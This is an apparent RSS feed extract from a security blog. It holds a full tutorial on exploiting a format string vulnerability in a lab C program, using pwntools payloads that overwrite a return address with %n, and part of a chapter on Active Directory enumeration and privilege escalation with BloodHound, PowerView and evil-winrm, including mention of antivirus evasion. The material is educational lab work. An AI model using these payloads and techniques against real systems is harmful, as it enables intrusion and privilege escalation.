
A closer look confirms that after `printf` executes, the memory values have been modified as intended, avoiding the infinite loop.

![](/content/images/2023/11/image-62.png)

# Conclusions

In today’s enlightening journey, we have navigated the complex waters of binary exploitation, focusing on the confluence of buffer overflow and format string vulnerabilities. This thorough exploration has not only reinforced our theoretical understanding but also highlighted the crucial importance of practical experimentation and adaptability in the field of cybersecurity.

Throughout this process, we uncovered how minute details, such as unexpected memory allocation by the compiler, can significantly deviate our initial plans. This experience underscores the importance of meticulous evaluation and a step-by-step problem-solving approach. It also illuminates the invaluable role of tools like radare2 in visualizing and manipulating a program’s memory structure.

The ability to adapt and refine our approaches in the face of unexpected challenges is essential. Each obstacle encountered and overcome not only enhances our exploitation technique but also deepens our understanding of the systems we seek to protect.

In conclusion, this chapter has been more than an exercise in exploit development; it&apos;s been a lesson in tenacity and continuous learning. It reminded us that in the realm of cybersecurity, theory and practice go hand in hand, and being prepared for the unexpected is an integral part of our quest to strengthen and secure our digital systems.

# Resources

[Ataque Format String · Guía de exploits](https://fundacion-sadosky.github.io/guia-escritura-exploits/format-string/5-practica.html)</content:encoded><author>Ruben Santos</author></item><item><title>Mastering Format String Exploits: A Comprehensive Guide</title><link>https://www.kayssel.com/post/format-string</link><guid isPermaLink="true">https://www.kayssel.com/post/format-string</guid><description>Explore the intricacies of format string vulnerabilities in C programming. Learn their risks, exploit development with radare2, and crafting Python exploits. Gain crucial insights into secure coding practices.</description><pubDate>Sun, 05 Nov 2023 12:42:22 GMT</pubDate><content:encoded># **Delving into Format String Vulnerabilities: An Educational Expedition**

Welcome, cyber enthusiasts and aspiring security professionals! Today&apos;s chapter unfolds an intriguing aspect of cybersecurity – the format string vulnerability, a classic yet crucial topic in the realm of secure coding. My personal journey with this vulnerability holds a special place, as it was the first one I mastered, offering insights not just into code exploits but also into the broader landscape of software vulnerabilities.

In this chapter, we&apos;re set to embark on a comprehensive journey, starting from the very basics of what a format string is and how it functions in the C programming language. We&apos;ll see how a simple string formatting feature in `printf` can turn into a security vulnerability when influenced by user input.

Our expedition will take us through:

1.  **The Anatomy of Format Strings**: Understanding how format strings operate within `printf`, showcasing their standard use and potential pitfalls.
2.  **Unveiling the Vulnerability**: A step-by-step breakdown of how format strings can be exploited, using a sample C program as our testing ground.
3.  **Exploit Development with Radare2**: Employing the powerful binary analysis tool, radare2, we will analyze, debug, and manipulate our test program, gaining hands-on experience in exploit development.
4.  **Crafting a Python Exploit**: Translating our findings into a practical exploit script, showcasing the real-world application of our theoretical knowledge.
5.  **Understanding the Risks**: Highlighting the critical importance of secure coding practices and the potential consequences of overlooking format string vulnerabilities.

Whether you&apos;re a seasoned security professional or a curious novice, this chapter promises a blend of technical depth and accessible learning. By the end of our exploration, you&apos;ll not only understand the intricacies of format string vulnerabilities but also appreciate their significance in the broader context of cybersecurity. So, let&apos;s dive in and unravel the mysteries of format string vulnerabilities together!

# **Understanding Format Strings: The Basics of `printf` Functionality**

Dive into the world of C programming where the format string stands as a key player in shaping the output of the `printf` function. Imagine you&apos;re working with the following C code:

```c
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

int main(int argc, char **argv){
  char to_print[6] = &quot;hello&quot;;  /* six bytes: &quot;hello&quot; plus its null terminator */
  printf(&quot;%s\n&quot;, to_print);
  printf(&quot;%x\n&quot;, to_print);
  return 0;
}

```

In this snippet, `to_print` is a friendly string that `printf` greets twice, each time with a different perspective. The `%s` specifier asks for a straightforward introduction in ASCII, while `%x` interprets the same argument as a number, revealing the string&apos;s memory address in hexadecimal form (a type mismatch, strictly speaking, but on a 32-bit build the pointer fits in an `unsigned int`).

![](/content/images/2023/11/image.png)

Exemplify what is a format string

These format specifiers, `%s` and `%x`, are like secret codes that control how data is presented. There&apos;s a whole world of them, such as `%d` for integers, each adding its unique flavor to the output. But here&apos;s a twist: if an attacker gets the reins over these format strings, it&apos;s not just about changing presentations anymore—it could open up serious security loopholes. And guess what? We&apos;re about to explore this intriguing and risky avenue in our next section! Stay tuned.

# **Exploring the Intricacies of a Format String Vulnerability**

Let&apos;s delve into the mechanics of a format string vulnerability, using a simple yet illustrative piece of C code. Picture this:

```c
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

void vuln(char *vuln_param){
  int local_var = 0x123;
  char str[13] = &quot;AAAABBBBCCCC\0&quot;;
  char to_print[6]  = &quot;hello\0&quot;;
  printf(vuln_param, to_print);
}

int main(int argc, char **argv){
  vuln(argv[1]);
}

```

Here, we have a classic setup with two functions, `main` and `vuln`, where `vuln` gets a spotlight by `main`. The twist? The user-supplied argument directly enters the `printf` function, handing over an unusual level of control to an external user.

Inside, variables like `local_var`, `str`, and `to_print` are not just random data; they&apos;re key players setting the stage for our vulnerability exploration.

Now, let&apos;s compile this intriguing code:

```bash
gcc -m32 -no-pie -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -z execstack -o formatstring formatstring.c

```

![](/content/images/2023/11/image-2.png)

Example of normal execution

Under normal circumstances, what you type is what you get on the screen. But what if we spice things up a bit? Enter `%s` or `%x` as format strings, and suddenly, `printf` unveils either `to_print`&apos;s content or its memory address.

![](/content/images/2023/11/image-4.png)

Example introduction of format strings

![](/content/images/2023/11/image-5.png)

Introduction of multiple format strings

But wait, there&apos;s more! What if we flood `printf` with a barrage of `%x`s? Surprise: a memory dump! Why does this happen? `printf`, in its diligent efforts, matches the number of format strings with arguments. Excess format strings lead to unintended memory revelations. For instance, enter enough `%x`s, and you&apos;ll see &quot;42414141&quot;, the ASCII equivalent of &quot;BAAA&quot; - a peek into the `str` variable&apos;s memory.

![](/content/images/2023/11/image-7.png)

Recognizing data

This diagram here simplifies what&apos;s happening when we overload `printf` with format strings, unlocking the potential to access hidden memory data.

![](/content/images/2023/11/image-9.png)

Stack diagram

So, we&apos;ve learned to unearth the process&apos;s in-memory secrets. But is that all? Can this vulnerability be leveraged further? Let&apos;s keep digging to find out!

# **Mastering the Art of Memory Manipulation: The Format String Offense**

Diving into the realm of format string vulnerabilities, we encounter `%n` – a seemingly innocuous player that holds the power to write into memory. The `printf` function, often a benign utility, can turn into a hacker&apos;s canvas when `%n` comes into play, especially when influenced by external, user-provided data.

```bash
man 3 printf

```

&lt;div class=&quot;kg-callout-card kg-callout-card-blue&quot;&gt;
  &lt;div class=&quot;kg-callout-emoji&quot;&gt;💡&lt;/div&gt;
  &lt;div class=&quot;kg-callout-text&quot;&gt;
    Code such as printf(foo); often indicates a bug, since foo may contain a % character. If foo comes from untrusted user input, it may contain %n, causing the printf() call to write to memory and creating a security hole.
  &lt;/div&gt;
&lt;/div&gt;

The `printf` function, when fed with untrusted input containing `%n`, inadvertently becomes a tool to modify memory. This ability to write arbitrarily in memory opens up two intriguing pathways for exploitation:

1.  **Variable Overwrite**: Imagine being able to change the value of a variable within a program, potentially unlocking areas or functionalities that are meant to be off-limits.
2.  **Return Address Hijacking**: The more ambitious path – modifying the return address of a function to wrestle control over the program&apos;s execution flow.

![](/content/images/2023/11/image-17.png)

Attack methodology

For today&apos;s exploration, our focus is laser-sharp on the latter: manipulating the function&apos;s return address. Here&apos;s the game plan:

1.  Insert the memory address containing the return address into `printf`.
2.  Scout for this address in the memory using `%x`.
3.  Once located, switch `%x` with `%n` to overwrite the return address.

Sounds complex? Fear not! We&apos;re about to break it down step by step, transforming this high-level strategy into an actionable exploit. Let&apos;s embark on this journey of memory manipulation!

# Exploit Development

## **Crafting the Exploit: Navigating the Memory Maze**

Embarking on the quest to develop an exploit for the format string vulnerability, the initial step is pinpointing the return address of the function. This critical detail lies within the recesses of the program&apos;s memory, and to uncover it, we turn to the trusty tool `radare2`.

```bash
r2 -d formatstring

```

Using `radare2`, we delve into the binary&apos;s structure, laying the groundwork for our exploit. The goal is to set a strategic breakpoint at the start of the vulnerable function.

![](/content/images/2023/11/image-12.png)

We analyzed and found vulnerable function name

![](/content/images/2023/11/image-13.png)

We set a breakpoint at the beginning of the function

Once reached, we employ the command &quot;dc&quot; to advance the program&apos;s execution to this point, allowing us to scrutinize the stack.

![](/content/images/2023/11/image-23.png)

Memory address pointing to the return address

Our prize? The memory address where the function&apos;s return address resides. Visualized in red in the provided image, this address is the key to manipulating the program&apos;s execution flow. For clarity, observe how this address aligns with the next instruction after the vulnerable function&apos;s execution.

![](/content/images/2023/11/image-15.png)

Return address

## **Constructing the Payload: A Step Towards Control**

Equipped with the knowledge of the memory address containing the function&apos;s return address, we move to the next phase of our exploit: crafting a payload that harnesses this information.

Our Python script, leveraging the power of the `pwn` library, is succinct yet potent. The script constructs a payload that embeds the crucial memory address:

```python
from pwn import *
import sys

payload = b&quot;&quot;
payload += p32(0xffffd920)
sys.stdout.buffer.write(payload)

```

In this snippet, `p32(0xffffd920)` translates the memory address into a 32-bit little-endian format, which is the format expected by our vulnerable program. This payload is then outputted, ready to be fed into the program as input.

![](/content/images/2023/11/image-18.png)

Memory address not displayable

When this payload is executed as an argument to our vulnerable program, it passes the memory address directly to `printf`. However, as it stands, this address is merely passed along - it won&apos;t display anything on its own since it&apos;s not a string or a recognizable format specifier.

## **Refining the Payload: Pinpointing the Return Address**

The journey of exploit development now enters a crucial phase where precision and observation converge. Our objective is to locate and manipulate the return address within the program&apos;s memory, using the format string vulnerability. To achieve this, we refine our Python exploit further, incorporating &quot;%x&quot; format specifiers to traverse and inspect the program&apos;s memory space.

```python
from pwn import *
import sys

payload = b&quot;&quot;
payload += p32(0xffffd6e0)
payload += b&quot;%x &quot; * 190
sys.stdout.buffer.write(payload)

```

![](/content/images/2023/11/image-24.png)

Recognizable pattern

As depicted in the image above, a distinctive &quot;pattern&quot; begins to emerge from the yellow segment onwards. These values correspond to &quot;%x&quot;.

![](/content/images/2023/11/image-21.png)

Identify that it is &quot;%x&quot;

In simpler terms, we have successfully arrived at the memory section housing the first parameter we&apos;ve supplied to printf.

![](/content/images/2023/11/image-22.png)

Updated diagram

However, when we inspect the memory dump image, discerning the precise location of the return address becomes a formidable challenge. Hence, we shall employ a series of &quot;A&quot; characters to pad the way.

```python
from pwn import *
import sys

payload = b&quot;A&quot; * 29
payload += p32(0xffffd6e0)
payload += b&quot;%x &quot; * 190
sys.stdout.buffer.write(payload)

```

![](/content/images/2023/11/image-25.png)

Recognizing the memory address

Thanks to this padding, combined with the matching &quot;%x&quot; pattern, we can now approximate the whereabouts of the return address, which we must target with &quot;%n.&quot; Our main objectives at this stage are twofold:

1.  Identify the exact &quot;%x&quot; that corresponds to the target address.
2.  Group the address into a single &quot;%x&quot; and subsequently transform it into &quot;%n.&quot;

With these goals in mind, let&apos;s adapt our exploit to locate the crucial &quot;%x.&quot;

```python
from pwn import *
import sys

payload = b&quot;A&quot; * 29
payload += p32(0xffffd6e0)
payload += b&quot;%x &quot; * 190
payload += b&quot;%x&quot;
payload += b&quot;B&quot; * 34
sys.stdout.buffer.write(payload)

```

-   To start, we&apos;ve introduced a separate &quot;%x,&quot; which we will later convert to &quot;%n.&quot;
-   Additionally, we&apos;ve appended padding &quot;B&quot; characters to ensure proper alignment of values, ensuring that the memory address we&apos;ve injected remains a unique &quot;%x.&quot;

&lt;div class=&quot;kg-callout-card kg-callout-card-blue&quot;&gt;
  &lt;div class=&quot;kg-callout-emoji&quot;&gt;💡&lt;/div&gt;
  &lt;div class=&quot;kg-callout-text&quot;&gt;
    At this juncture, I recommend executing the exploit directly with radare2 to scrutinize its behavior.
  &lt;/div&gt;
&lt;/div&gt;

Upon running the script, we notice that we still have a considerable number of &quot;%x&quot; ahead. Therefore, further adjustments and fine-tuning are required.

![](/content/images/2023/11/image-33.png)

Entering the padding at the end with &quot;B&quot;

When you reach the point where the &quot;%x&quot; stops displaying memory address values, it&apos;s time to refine the count of &quot;B&quot; characters at the end. In my case, the exploit has settled at 171 &quot;%x.&quot;

```python
from pwn import *
import sys

payload = b&quot;A&quot;*29
payload += p32(0xffffd6e0)
payload += b&quot;%x &quot; * 170
payload += b&quot;%x&quot;
payload += b&quot;B&quot;* 34
sys.stdout.buffer.write(payload)

```

![](/content/images/2023/11/image-34.png)

We finish finding the %x

As we execute this script, we observe the memory dump and make iterative adjustments to the number of &quot;%x&quot; and &quot;B&quot;s, striving for an alignment that places our target address precisely within a single &quot;%x&quot;. This meticulous process involves running the script multiple times, each time tweaking the payload slightly:

```python
from pwn import *
import sys

payload = b&quot;A&quot;*29
payload += p32(0xffffd6e0)
payload += b&quot;%x &quot; * 170
payload += b&quot;%x&quot;
payload += b&quot;B&quot;* 30
sys.stdout.buffer.write(payload)

```

![](/content/images/2023/11/image-29.png)

%x number 171

When the alignment is perfected, the targeted &quot;%x&quot; now precisely corresponds to our injected memory address. This setup is verified by placing a breakpoint just before the function returns and inspecting the stack. The modification of the return address becomes evident, signifying our successful manipulation.

![](/content/images/2023/11/image-31.png)

Breakpoint just before leaving the vulnerable function

![](/content/images/2023/11/image-30.png)

Evidence of modification of return address

Continuing the execution post-modification leads to an error - a clear indication of our exploit&apos;s impact. We have effectively altered the program&apos;s execution flow, demonstrating the potency of format string vulnerabilities.

![](/content/images/2023/11/image-32.png)

Change of the return address

# **Concluding Insights: The Power and Risks of Format String Vulnerabilities**

In this exploration of format string vulnerabilities, we&apos;ve delved deep into the mechanics and implications of this classic yet potent security flaw. Our journey illuminated the dual aspects of format strings in C programming: their utility in formatting outputs and their potential as a security vulnerability when improperly managed.

Key Takeaways:

1.  **Understanding Format Strings**: We began by understanding the basic role of format strings in functions like `printf`, where they dictate how variables are displayed. The seemingly benign use of `%s` for strings or `%x` for hexadecimal values, when user-controlled, opened the door to memory manipulation.
2.  **Vulnerability in Action**: Through a hands-on example, we witnessed how user-controlled format strings could lead to memory dumps. The `printf` function&apos;s expectation of matching format strings and arguments, when unmet, inadvertently led to revealing or altering memory contents.
3.  **Crafting the Exploit**: The real crux of our journey was developing an exploit. We methodically constructed a Python script to exploit the vulnerability, showcasing each step from injecting memory addresses to locating and modifying the return address of a function.
4.  **Radare2 as a Tool**: Utilizing radare2, a powerful binary analysis tool, we analyzed and debugged our vulnerable program. This process was instrumental in understanding the stack&apos;s behavior and refining our exploit.
5.  **Exploitation Strategy**: Our exploit strategically used `%n`, a format specifier that allows writing to memory, turning a simple output function into a potent tool for altering a program&apos;s execution flow.
6.  **Implications and Caution**: This exploration underscores the significance of validating and sanitizing user input, particularly in functions that handle format strings. It serves as a reminder of the delicate balance between functionality and security in programming.

In summary, the format string vulnerability offers a compelling case study in cybersecurity. It exemplifies how a fundamental aspect of programming can be twisted into a security threat, reminding us of the constant vigilance required in the digital realm. Our hands-on approach not only unveiled the technicalities of exploiting this vulnerability but also highlighted the broader implications for secure coding practices. As we conclude this chapter, we are left with a deeper appreciation for the intricacies of cybersecurity and the ever-evolving challenge of protecting digital systems.

# Tips of the article


&lt;details&gt;
&lt;summary&gt;What is format string ?&lt;/summary&gt;

A format string is nothing more than a way for the &quot;printf&quot; function to set the output format that a given value will take. For example, %x is used to display the value in hexadecimal while %s is used in ASCII.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What are the consequences of passing user-controlled parameters to printf?&lt;/summary&gt;

-   It may cause you to enter multiple &quot;%x&quot; so that it dumps the entire contents of memory.
-   Secondly, it can cause an attacker to enter &quot;%n&quot; and thus be able to modify values in memory.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What is the main thing an attacker can look for by modifying values with format string?&lt;/summary&gt;

-   You may be looking to modify the return address of a function.
-   You may be looking to modify the value of a particular variable to change the execution flow of a program.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;Could you tell me what are the key points to look at when we are exploiting this vulnerability and we want to modify the return address?&lt;/summary&gt;

![](/content/images/2023/11/image-17.png)

Attack methodology
&lt;/details&gt;

# Resources

[Vulnerabilidades Format String · Guía de exploits](https://fundacion-sadosky.github.io/guia-escritura-exploits/format-string/5-format-string.html)</content:encoded><author>Ruben Santos</author></item><item><title>Active Directory Enumeration: Automated and Manual Techniques for Privilege Escalation</title><link>https://www.kayssel.com/post/introduction-to-active-directory-9-enumeration</link><guid isPermaLink="true">https://www.kayssel.com/post/introduction-to-active-directory-9-enumeration</guid><description>Explore Active Directory enumeration and privilege escalation techniques, using tools like BloodHound for automatic insights and PowerView for stealthy, manual analysis in complex network environments</description><pubDate>Mon, 23 Oct 2023 14:18:11 GMT</pubDate><content:encoded># Decoding Active Directory: From Enumeration to Escalation

Welcome to a new chapter in the world of Active Directory (AD) exploration! If you&apos;ve been following our series, you&apos;re already familiar with the basics of AD and the common attacks used for initial access in these environments. Now, we&apos;re shifting gears to focus on methods of enumerating Active Directory once we have a foothold, coupled with strategies for privilege escalation.

Today&apos;s journey dives into the realm of automatic enumeration with BloodHound, a tool that has become indispensable for its ability to unravel complex privilege relationships in AD environments. We&apos;ll also walk through manual enumeration techniques, utilizing PowerView and windapsearch, for those instances where discretion and stealth are paramount.

This chapter is about striking the perfect balance: using advanced tools like BloodHound for comprehensive insights while also mastering the art of manual enumeration to minimize our digital footprint. Whether you&apos;re part of a red team needing to move quietly or you&apos;re just looking to expand your AD knowledge, this chapter will equip you with both the tools and the understanding necessary to navigate the multifaceted landscape of Active Directory.

So gear up, as we embark on this detailed journey to master the art of AD enumeration and leverage this knowledge for effective privilege escalation. Let&apos;s get started!

# Optimizing Active Directory Audits: Profound Insights with BloodHound, Sharphound, Python-Bloodhound, and RustHound

In the realm of Active Directory domain enumeration, BloodHound emerges as a pivotal tool, particularly for internal audits where network noise is a secondary concern. It functions like a navigational compass, pointing the way to privilege escalation within a domain. BloodHound, in essence, employs graph theory to uncover hidden relationships within an Active Directory or Azure environment, simplifying the visualization of complex attack paths. The installation of BloodHound is straightforward, following a basic tutorial available on Kali Linux&apos;s website.

[bloodhound | Kali Linux Tools](https://www.kali.org/tools/bloodhound/)

Once installed, accessing BloodHound is done through Neo4j credentials, leading to a user-friendly graphical interface.

## Python-Bloodhound: Efficiently Enumerating Active Directory for Security Analysis

Setting up the graphical interface of BloodHound is just the initial step. The real power of BloodHound comes to the fore when it&apos;s fed with comprehensive data from the target network. To gather this data, there are several effective tools at your disposal, each with its unique advantages.

One of the most user-friendly options is &quot;bloodhound-python&quot;, which can be run directly from your Kali machine. This tool is designed to extract a wide array of data in an efficient manner. A typical command to gather extensive data using bloodhound-python looks something like this:

```bash
bloodhound-python -u beruinsect -p &apos;Password1&apos; -ns 192.168.253.120 -d shadow.local -c all --zip 
```

In this command:

-   `-u beruinsect` and `-p &apos;Password1&apos;` specify the username and password.
-   `-ns 192.168.253.120` indicates the IP address of the name server.
-   `-d shadow.local` specifies the domain.
-   `-c all` tells the tool to collect all types of data.
-   `--zip` compresses the collected data into a zip file for easy upload to BloodHound.

![](/content/images/2023/10/image-60.png)

In scenarios where you&apos;re using dynamic port forwarding, you might need to run bloodhound-python through proxychains to ensure it can communicate with the network. This would look something like:

```bash
proxychains bloodhound-python -u beruinsect -p &apos;Password1&apos; -ns 192.168.253.120 -d shadow.local -c all --zip --dns-tcp
```

## RustHound: A Rapid Approach to Active Directory Data Collection

RustHound emerges as a compelling alternative for data collection in Active Directory environments, especially when speed is a critical factor. Although it might not boast the comprehensive feature set of bloodhound-python, RustHound compensates with its rapid data acquisition capabilities. What makes RustHound particularly intriguing is its knack for uncovering privilege escalation paths that might elude bloodhound-python.

This distinct edge in RustHound&apos;s functionality can be a game-changer in certain scenarios. By offering different insights and potentially revealing unique escalation routes, RustHound adds another dimension to your enumeration strategy. It&apos;s a testament to the fact that in the realm of network security and penetration testing, having a diverse toolkit can lead to more thorough and effective exploration of potential vulnerabilities.

Utilizing RustHound from Kali Linux can supplement the data gathered by other tools, providing a more rounded view of the network&apos;s security posture. It&apos;s an excellent example of how varied tools can complement each other, enhancing the overall effectiveness of your security analysis.

[GitHub - NH-RED-TEAM/RustHound: Active Directory data collector for BloodHound written in Rust. 🦀](https://github.com/NH-RED-TEAM/RustHound)

## Sharphound: The Essential Binary Tool for In-Depth Active Directory Analysis

Sharphound stands as a prominent tool in the realm of Active Directory enumeration, widely recognized for its efficacy in data collection. However, its popularity comes with a caveat - it&apos;s well-known to antivirus solutions. This recognition often leads to immediate detection and removal by antivirus programs, posing a significant challenge for its deployment.

To effectively utilize Sharphound in environments with active antivirus protection, one must employ evasion techniques to bypass these security measures. This could involve modifying the Sharphound binary to evade signature-based detection or using more sophisticated methods to cloak its activities.

The necessity to circumvent antivirus detection underscores the continuous cat-and-mouse game between security tools and protective measures. Sharphound’s effectiveness makes it a valuable asset for penetration testers and security analysts, but its conspicuous nature demands a higher level of stealth and creativity in its application.

For those interested in exploring Sharphound&apos;s capabilities and integrating it into their security assessments, the official repository provides a wealth of information and resources. It serves as a starting point for understanding the tool&apos;s functionality and potential applications in unraveling complex Active Directory environments.

[GitHub - BloodHoundAD/SharpHound: C# Data Collector for BloodHound](https://github.com/BloodHoundAD/SharpHound)

## Data Visualization with Bloodhound: Unraveling Active Directory&apos;s Hidden Paths

After successfully gathering data using tools like bloodhound-python, RustHound, or SharpHound, the next critical step is to upload this data into BloodHound for analysis. This is a straightforward process. BloodHound provides an intuitive user interface, featuring a dedicated button for importing data.

You simply locate the button for uploading data, which is typically found on the BloodHound interface. Clicking this button will prompt you to select the data file you wish to upload. This file is often in a compressed format (like .zip), containing all the information gathered by your chosen data collection tool.

For instance, if you used bloodhound-python, your data file might be named something like &apos;python-bloodhound.zip&apos;. Select this file, and BloodHound will begin processing and integrating the data into its database. Once the upload is complete, BloodHound will display the newly imported data, ready for you to analyze. You can now explore various attack paths, identify potential vulnerabilities, and plan your approach for privilege escalation or other security assessments within the Active Directory environment.

![](/content/images/2023/10/image-62.png)

Uploading data to BloodHound

![](/content/images/2023/10/image-63.png)

.zip formed by python-bloodhound.zip

Once we&apos;ve loaded the data into BloodHound, we embark on a journey of analytical possibilities. This powerful tool unfolds a variety of predefined paths for exploration. For instance, it effortlessly reveals users within the Active Directory who are susceptible to Kerberoasting. This feature is pivotal as it helps us pinpoint potential targets for elevating our privileges within the domain.

![](/content/images/2023/10/image-64.png)

Users vulnerable to Kerberoast

But that&apos;s just the beginning. BloodHound also guides us in finding the most direct and efficient route to the coveted position of a domain administrator. And if you&apos;re contemplating executing a DCSync attack, BloodHound brilliantly illuminates various pathways to accomplish it successfully.

![](/content/images/2023/10/image-65.png)

Shortest way to become a domain administrator

![](/content/images/2023/10/image-67.png)

Possible ways to do dcsync

What&apos;s truly captivating about BloodHound is its ability to provide detailed guidance on how to exploit specific configurations. A simple right-click on any graph link reveals necessary information for leveraging that particular setup. This level of detail is invaluable, especially when dealing with extended rights and other intricate aspects of Active Directory.

![](/content/images/2023/10/image-68.png)

Edge help

![](/content/images/2023/10/image-69.png)

Path to escalate privileges

And if these predefined routes aren&apos;t enough, BloodHound allows you to dive deeper. You can craft your own custom queries using the Cypher language, utilized in Neo4j. This means you can fine-tune your search to extract precisely the information you need. For example, if you&apos;re interested in service accounts that might be vulnerable to Kerberoasting and contain &apos;SQL&apos; in their names, BloodHound enables you to formulate a specific query for that.

![](/content/images/2023/10/image-70.png)

Creation of own queries

Imagine you want to delve deeper into identifying service accounts potentially vulnerable to Kerberoasting and specifically those associated with &apos;SQL&apos;. BloodHound empowers you with the ability to create such targeted queries. Using its Cypher query language, you can pinpoint these accounts with precision.

Here&apos;s how you can structure this specific query:

```cypher
MATCH (u:User) WHERE ANY (x IN u.serviceprincipalnames WHERE toUpper(x) CONTAINS &apos;SQL&apos;) RETURN u
```

This query effectively scans through user accounts, focusing on service principal names. It filters out those containing &apos;SQL&apos;, providing a concise list of relevant targets. This level of detailed querying is a testament to BloodHound&apos;s adaptability and depth, allowing you to tailor your investigation to your specific needs.

![](/content/images/2023/10/image-71.png)

Query to show accounts vulnerable to Kerberoast and containing &quot;SQL&quot;.
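The same SPN filter can also be sanity-checked offline against the users JSON that bloodhound-python drops into its zip. A minimal sketch, assuming the property names of a recent bloodhound-python export (field names vary between collector versions, so check yours):

```python
# Sketch: applying the SQL-SPN filter offline to a bloodhound-python
# users export. Property names are assumptions; verify against your collector.
def sql_spn_users(users: list) -> list:
    hits = []
    for u in users:
        props = u.get("Properties", {})
        spns = props.get("serviceprincipalnames") or []
        # Same logic as the Cypher query: any SPN containing 'SQL', case-insensitive
        if any("SQL" in spn.upper() for spn in spns):
            hits.append(props.get("name"))
    return hits

# Invented sample records mimicking the export shape
sample = [
    {"Properties": {"name": "SVC_SQL@SHADOW.LOCAL",
                    "serviceprincipalnames": ["MSSQLSvc/db01.shadow.local:1433"]}},
    {"Properties": {"name": "BERUINSECT@SHADOW.LOCAL",
                    "serviceprincipalnames": []}},
]
print(sql_spn_users(sample))
```

This is handy when you want to re-run queries against old collections without reimporting them into Neo4j.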

Cypher&apos;s syntax may be relatively straightforward, but it unlocks a world of possibilities when exploring Active Directory data. For those who wish to delve deeper, a comprehensive list of queries can be found in the BloodHound Cypher Cheatsheet. This resource is invaluable for both newcomers and seasoned professionals.

BloodHound utilizes Neo4j, a graph database, for its data structuring, and Cypher serves as the language for querying this complex information. Cypher might seem a bit intricate at first – it&apos;s almost akin to crafting with ASCII art – but its potential for revealing critical insights in your data is immense.

The Cheatsheet provided at [BloodHound Cypher Cheatsheet](https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/) is more than just a guide; it&apos;s a treasure trove of queries. It covers a wide range of scenarios and objectives, providing tailored queries for specific data extractions and insights. This resource is an essential tool for anyone looking to maximize their use of BloodHound, offering guidance and inspiration for diverse and effective data analysis.

# Mastering Manual Techniques: A Guide to In-Depth Active Directory Enumeration

Manual enumeration is a critical skill for Red teams aiming for stealth and minimal digital footprint. This process involves meticulously gathering information without triggering alarms. PowerView and evil-winrm are key tools in this task, allowing for in-depth exploration of Active Directory environments.

Another pivotal element in manual enumeration is LDAP (Lightweight Directory Access Protocol). It&apos;s an efficient way to remotely query the domain database (NTDS) for valuable data on users, groups, and computers within a domain. For this purpose, windapsearch is an invaluable utility, offering a streamlined approach to LDAP queries.

[GitHub - ropnop/go-windapsearch: Utility to enumerate users, groups and computers from a Windows domain through LDAP queries](https://github.com/ropnop/go-windapsearch)
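Under the hood, modules like these boil down to LDAP search filters. As a rough sketch of the kind of filter a kerberoastable-accounts query uses (a commonly seen pattern, not necessarily the exact filter windapsearch emits):

```python
# Sketch of a typical LDAP filter for kerberoastable accounts.
# 1.2.840.113556.1.4.803 is the LDAP_MATCHING_RULE_BIT_AND matching rule;
# userAccountControl bit 2 marks disabled accounts.
def kerberoastable_filter() -> str:
    return (
        "(&"
        "(objectClass=user)"
        "(servicePrincipalName=*)"          # has at least one SPN
        "(!(sAMAccountName=krbtgt))"        # skip the krbtgt account
        "(!(userAccountControl:1.2.840.113556.1.4.803:=2))"  # skip disabled accounts
        ")"
    )

print(kerberoastable_filter())
```

Knowing the raw filter lets you reproduce the same query with any LDAP client if your preferred tool is unavailable on an engagement.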

It&apos;s important to remember that these tools are just examples of what&apos;s available for domain enumeration. The cyber security landscape is rich with alternatives like enum4linux and crackmapexec, each offering unique features and approaches. It&apos;s worthwhile to experiment with these tools and discover which ones align best with your needs and preferences.

In manual enumeration, asking the right questions is as important as the tools you use. A well-structured approach, as outlined in the provided diagram, guides you through a thorough and effective enumeration process. It&apos;s about piecing together the puzzle of a domain&apos;s structure and vulnerabilities, one detail at a time.

![](/content/images/2023/10/image-82.png)

Diagram of questions we should answer from the domain

## Effective Domain Management: Utilizing Evil-WinRM for Advanced Active Directory Enumeration

Evil-winrm, a potent tool in the arsenal of penetration testers, serves as a gateway to Windows Remote Management (WinRM). As explored in our previous discussions, particularly in [chapter 5](https://www.kayssel.com/post/active-directory-5/), this tool&apos;s effectiveness in script execution is unparalleled.

To initiate, use the command: `evil-winrm --ip &lt;target-ip&gt; -u &lt;user&gt; -p &lt;password&gt; -s &lt;scripts_directory&gt;`. This launches a shell where specific scripts can be invoked, embedding their functions into the session&apos;s memory. It&apos;s a seamless process that amplifies your capabilities within the target environment.

![](/content/images/2023/10/image-28.png)

Running winrm with powerview

This article expands beyond our prior discussions, diving into the enumeration of Group Policy Objects (GPOs), Organizational Units (OUs), and Access Control Lists (ACLs). These elements, crucial in understanding the intricacies of Active Directory environments, were not covered in earlier articles. By integrating these concepts here, we aim to enrich your comprehension and operational capacity in these domains.

## Unraveling the Domain Structure: Key Insights for Targeted Exploration

Diving into the domain structure is a crucial first step once we&apos;ve established a shell in our target environment. Understanding the domain&apos;s hierarchy, including its possible placement within a forest or its relationship with parent domains, lays the foundation for deeper exploration. This knowledge is pivotal in plotting a path for privilege escalation or identifying potential vulnerabilities.

To extract domain information, the `Get-NetDomain` function serves as our primary tool. This function reveals critical details about the domain&apos;s structure and attributes.

![](/content/images/2023/10/image-29.png)

Domain information

Equally important is capturing the domain&apos;s Security Identifier (SID) using `Get-DomainSID`. The SID, a unique identifier, plays a vital role in various advanced techniques, such as forging Golden Tickets, which can grant extensive access within the domain.

![](/content/images/2023/10/image-30.png)

Domain SID
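To see why the SID is so valuable, recall that every domain principal is simply the domain SID with a relative identifier (RID) appended, and several RIDs are well known. A small sketch with a made-up domain SID:

```python
# Sketch: deriving well-known principal SIDs from a domain SID.
# The domain SID below is a fabricated example value.
DOMAIN_SID = "S-1-5-21-1004336348-1177238915-682003330"

WELL_KNOWN_RIDS = {
    500: "Administrator",
    502: "krbtgt",
    512: "Domain Admins",
    519: "Enterprise Admins",
}

def principal_sid(domain_sid: str, rid: int) -> str:
    """A principal SID is just the domain SID with the RID appended."""
    return f"{domain_sid}-{rid}"

for rid, name in WELL_KNOWN_RIDS.items():
    print(rid, name, principal_sid(DOMAIN_SID, rid))
```

This is exactly why a Golden Ticket only needs the domain SID (plus the krbtgt hash): the ticket can claim membership of RID 512 directly.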

